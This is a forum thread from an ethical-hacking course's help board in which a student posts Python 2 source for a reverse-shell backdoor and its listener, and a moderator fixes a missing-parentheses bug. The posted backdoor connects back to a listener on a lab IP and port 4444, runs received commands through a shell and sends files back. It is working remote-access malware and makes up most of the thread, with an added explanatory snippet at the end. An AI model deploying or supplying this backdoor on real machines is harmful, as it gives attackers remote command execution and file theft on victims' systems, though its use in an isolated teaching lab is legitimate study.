- This topic has 14 replies, 2 voices, and was last updated 4 years, 6 months ago by Diego Pérez.
May 25, 2020 at 9:54 pm #38060 cybersamuraiDK (Participant)
So I am following the course: Learn Python & Ethical Hacking From Scratch with Zaid.
And I am in the section where we set up a backdoor on our Windows machine, and a listener in Kali Linux.
I have followed Zaid's video 100% and this is the listener code:
```python
#!/usr/bin/env python
import socket
import json


class Listener:
    def __init__(self, ip, port):
        listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        listener.bind((ip, port))
        listener.listen(0)
        print("[+] Waiting for incoming connections")
        self.connection, address = listener.accept()
        print("[+] Got a connection from " + str(address))

    def reliable_send(self, data):
        json_data = json.dumps(data)
        self.connection.send(json_data)

    def reliable_receive(self):
        # Keep reading until the buffer parses as one complete JSON value.
        json_data = ""
        while True:
            try:
                json_data = json_data + self.connection.recv(1024)
                return json.loads(json_data)
            except ValueError:
                continue

    def execute_remotely(self, command):
        self.reliable_send(command)
        if command[0] == "exit":
            self.connection.close()
            exit()
        return self.reliable_receive

    def write_file(self, path, content):
        with open(path, "wb") as file:
            file.write(content)
            return "[+] Download successful."

    def run(self):
        while True:
            command = raw_input(">> ")
            command = command.split(" ")
            result = self.execute_remotely(command)
            if command[0] == "download":
                result = self.write_file(command[1], result)
            print(result())


my_listener = Listener("10.0.2.10", 4444)
my_listener.run()
```
I had to rework **print(result())**
Otherwise it looked like this when doing system commands:
```
[+] Got a connection from ('10.0.2.15', 49848)
>> dir
<bound method Listener.reliable_receive of <__main__.Listener instance at 0x7f7aa7776190>>
```
But now when I try to download a sample.txt from my Windows machine I get this error:
```
[+] Got a connection from ('10.0.2.15', 49846)
>> download sample.txt
Traceback (most recent call last):
  File "listener.py", line 55, in <module>
    my_listener.run()
  File "listener.py", line 49, in run
    result = self.write_file(command[1], result)
  File "listener.py", line 40, in write_file
    file.write(content)
TypeError: argument 1 must be string or buffer, not instancemethod
```
I am stuck at this point until I can make it work! Have been spending days trying to figure it out 🙁 Please help.

May 26, 2020 at 6:19 am #38092 Diego Pérez (Moderator)
Hi CyberSamurai!
It looks like the error may be in the backdoor code.
Can you share it please? Also it would be better to share it including indentation because it's difficult to read it this way.
Thanks!
Diego

May 26, 2020 at 8:08 am #38116 cybersamuraiDK (Participant)
Yes sir 🙂
This is the backdoor code running on my Windows 10 machine.
```python
#!/usr/bin/env python
import socket
import subprocess
import json
import os


class Backdoor:
    def __init__(self, ip, port):
        self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.connection.connect((ip, port))

    def reliable_send(self, data):
        json_data = json.dumps(data)
        self.connection.send(json_data)

    def reliable_receive(self):
        json_data = ""
        while True:
            try:
                # Append each chunk so a message longer than 1024 bytes still parses.
                json_data = json_data + self.connection.recv(1024)
                return json.loads(json_data)
            except ValueError:
                continue

    def execute_system_command(self, command):
        return subprocess.check_output(command, shell=True)

    def change_working_directory_to(self, path):
        os.chdir(path)
        return "[+] Changing CD to " + path

    def read_file(self, path):
        with open(path, "rb") as file:
            return file.read()

    def run(self):
        while True:
            command = self.reliable_receive()
            if command[0] == "exit":
                self.connection.close()
                exit()
            elif command[0] == "cd" and len(command) > 1:
                command_result = self.change_working_directory_to(command[1])
            elif command[0] == "download":
                command_result = self.read_file(command[1])
            else:
                command_result = self.execute_system_command(command)
            self.reliable_send(command_result)


my_backdoor = Backdoor("10.0.2.10", 4444)
my_backdoor.run()
```

May 27, 2020 at 5:53 am #38223 Diego Pérez (Moderator)
Hi!
Thanks!
Following both codes, it turns out you have this line at the bottom of your listener:
print(result())
Please remove the parentheses of result. Like this: print(result)
Let me know how it goes!
Diego

May 27, 2020 at 9:30 am #38243 cybersamuraiDK (Participant)
When I remove the () from print(result()), all terminal commands are like this:
```
root@kali:~/PycharmProjects/Malware/Backdoor# python listener.py
[+] Waiting for incoming connections
[+] Got a connection from ('10.0.2.15', 49834)
>> dir
<bound method Listener.reliable_receive of <__main__.Listener instance at 0x7f1b331b90f0>>
>>
```

May 28, 2020 at 6:18 am #38314 Diego Pérez (Moderator)
Hi! That's weird, because calling result() is like calling a function and not a variable.
Can you share the listener again but with indentation please?
Also can you add a print in the reliable_receive function just before the return:
print(json.loads(json_data))
Let me know.
Diego

May 28, 2020 at 6:30 am #38318 cybersamuraiDK (Participant)
This is the code 🙂 Thank you for helping me out, I am a little bit stuck, can't go any further in the course.
Forgot something, will add more in a moment.

May 28, 2020 at 6:40 am #38323 cybersamuraiDK (Participant)
Thank you for helping me out 🙂
I still get the same:
```
[+] Waiting for incoming connections
[+] Got a connection from ('10.0.2.15', 49707)
>> dir
<bound method Listener.reliable_receive of <__main__.Listener instance at 0x7fa8d4aa5190>>
>>
```
```python
#!/usr/bin/env python
import socket
import json


class Listener:
    def __init__(self, ip, port):
        listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        listener.bind((ip, port))
        listener.listen(0)
        print("[+] Waiting for incoming connections")
        self.connection, address = listener.accept()
        print("[+] Got a connection from " + str(address))

    def reliable_send(self, data):
        json_data = json.dumps(data)
        self.connection.send(json_data)

    def reliable_receive(self):
        json_data = ""
        while True:
            try:
                json_data = json_data + self.connection.recv(1024)
                print(json.loads(json_data))
                return json.loads(json_data)
            except ValueError:
                continue

    def execute_remotely(self, command):
        self.reliable_send(command)
        if command[0] == "exit":
            self.connection.close()
            exit()
        return self.reliable_receive

    def write_file(self, path, content):
        with open(path, "wb") as file:
            file.write(content)
            return "[+] Download successful."

    def run(self):
        while True:
            command = raw_input(">> ")
            command = command.split(" ")
            result = self.execute_remotely(command)
            if command[0] == "download":
                result = self.write_file(command[1], result)
            print(result)


my_listener = Listener("10.0.2.10", 4444)
my_listener.run()
```

May 28, 2020 at 6:44 am #38324 cybersamuraiDK (Participant)
The real strange thing is that if I write the code like this:
```python
#!/usr/bin/env python
import socket
import json


class Listener:
    def __init__(self, ip, port):
        listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        listener.bind((ip, port))
        listener.listen(0)
        print("[+] Waiting for incoming connections")
        self.connection, address = listener.accept()
        print("[+] Got a connection from " + str(address))

    def reliable_send(self, data):
        json_data = json.dumps(data)
        self.connection.send(json_data)

    def reliable_receive(self):
        json_data = ""
        while True:
            try:
                json_data = json_data + self.connection.recv(1024)
                print(json.loads(json_data))
                return json.loads(json_data)
            except ValueError:
                continue

    def execute_remotely(self, command):
        self.reliable_send(command)
        if command[0] == "exit":
            self.connection.close()
            exit()
        return self.reliable_receive

    def write_file(self, path, content):
        with open(path, "wb") as file:
            file.write(content)
            return "[+] Download successful."

    def run(self):
        while True:
            command = raw_input(">> ")
            command = command.split(" ")
            result = self.execute_remotely(command)
            if command[0] == "download":
                result = self.write_file(command[1], result())
            print(result())


my_listener = Listener("10.0.2.10", 4444)
my_listener.run()
```
I end up with this result, when trying to use “download sample.txt”:
>> download sample.txt
```
Traceback (most recent call last):
  File "temp.py", line 57, in <module>
    my_listener.run()
  File "temp.py", line 53, in run
    print(result())
TypeError: 'str' object is not callable
```

May 29, 2020 at 6:06 am #38441 Diego Pérez (Moderator)
Hi!
Yeah, this last issue makes more sense, it happens because () makes Python think it is a function when it is a string, that's why the error says that a string can not be callable.
Will test your code and let you know.
Are you using python2 or 3 to run the code?
Greetings!
Diego

May 29, 2020 at 7:22 am #38443 cybersamuraiDK (Participant)
I am using Python 2 🙂 just like Zaid in the course.

May 30, 2020 at 4:04 am #38528 Diego Pérez (Moderator)
Hi!
Ok! I haven't had time to test your code yet, will come back as soon as I do it.
Greetings!
Diego

June 2, 2020 at 4:37 am #38799 Diego Pérez (Moderator)
Hi!
Sorry to reply until now but I haven't had so much time to test your code.
Now I did it and found the error: in line "return self.reliable_receive" in execute_remotely you are missing the parentheses, it should be like this:
return self.reliable_receive()
This will make it work.
Greetings!
Diego

June 2, 2020 at 8:00 am #38824 cybersamuraiDK (Participant)
Diego 🙂 I want to thank you with all my heart! It freakin works! 😀 😀
You don't know how many hours/days I have used to try and solve this. I am taking an exam today about cybersec, and this was going to be my masterpiece 🙂 so you could imagine HOW MUCH I was sweating and biting nails because I couldn't get it to work.
Thank you 🙂 MY presentation is saved!

June 3, 2020 at 5:28 am #38920 Diego Pérez (Moderator)
Hi!
Cool you got it! Glad to help!
Diego
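
The difference the accepted fix turns on, as an added example that is not part of the original thread or the course code: returning `self.reliable_receive` hands back the bound method without reading anything, while `self.reliable_receive()` returns the decoded message. It is written for Python 3 (the thread uses Python 2), and `FakeConnection`, `Receiver`, `execute_buggy`, `execute_fixed` and `demo` are hypothetical names, with an in-memory object standing in for the socket.

```python
# Added illustration (Python 3); all class and function names here are hypothetical.
import io
import json


class FakeConnection:
    """Constructed stand-in for a socket: returns one JSON message in small chunks."""

    def __init__(self, message, chunk_size=8):
        self._stream = io.BytesIO(json.dumps(message).encode())
        self._chunk_size = chunk_size

    def recv(self, _bufsize):
        return self._stream.read(self._chunk_size)


class Receiver:
    def __init__(self, connection):
        self.connection = connection

    def reliable_receive(self):
        data = b""
        while True:
            chunk = self.connection.recv(1024)
            if not chunk:  # peer closed before a full message arrived
                raise ConnectionError("incomplete JSON message")
            data += chunk
            try:
                return json.loads(data)  # succeeds only once the value is complete
            except ValueError:
                continue

    def execute_buggy(self):
        return self.reliable_receive    # the bound method itself; nothing is read

    def execute_fixed(self):
        return self.reliable_receive()  # calls it; returns the decoded message


def demo():
    buggy = Receiver(FakeConnection("sample text")).execute_buggy()
    fixed = Receiver(FakeConnection("sample text")).execute_fixed()
    try:
        io.BytesIO().write(buggy)       # same kind of failure as write_file in the thread
        write_error = None
    except TypeError as exc:
        write_error = type(exc).__name__
    return callable(buggy), fixed, write_error
```

`callable(result)` is a quick check when a value prints as `<bound method ...>`: if it is true, a pair of parentheses is missing where the value was produced, not where it is printed.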